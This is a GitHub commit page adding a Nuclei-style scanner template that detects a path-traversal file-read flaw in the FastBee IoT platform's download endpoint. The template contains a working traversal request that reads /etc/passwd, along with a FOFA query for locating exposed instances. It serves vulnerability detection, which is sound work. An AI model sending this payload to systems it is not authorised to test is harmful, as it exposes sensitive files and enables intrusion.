Ritik Chaddha
GitHub
commit
31508a7825
|
|
@ -0,0 +1,53 @@
|
|||
id: fastbee-arbitrary-file-read
|
||||
|
||||
info:
|
||||
name: FastBee - Local File Inclusion
|
||||
author: s4e-io
|
||||
severity: high
|
||||
description: |
|
||||
Arbitrary file read vulnerability exists in FastBee IoT platform download, which may lead to sensitive information leakage, data theft and other security risks, thus causing serious harm to the system and users.
|
||||
reference:
|
||||
- https://blog.csdn.net/weixin_43167326/article/details/141806542
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: fastbee
|
||||
product: fastbee
|
||||
fofa-query: "fastbee"
|
||||
tags: fastbee,iot,lfi
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body,"<title>FastBee")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
||||
internal: true
|
||||
|
||||
- raw:
|
||||
- |
|
||||
GET /prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
|
||||
- type: word
|
||||
part: content_type
|
||||
words:
|
||||
- 'application/octet-stream'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
Loading…
Reference in New Issue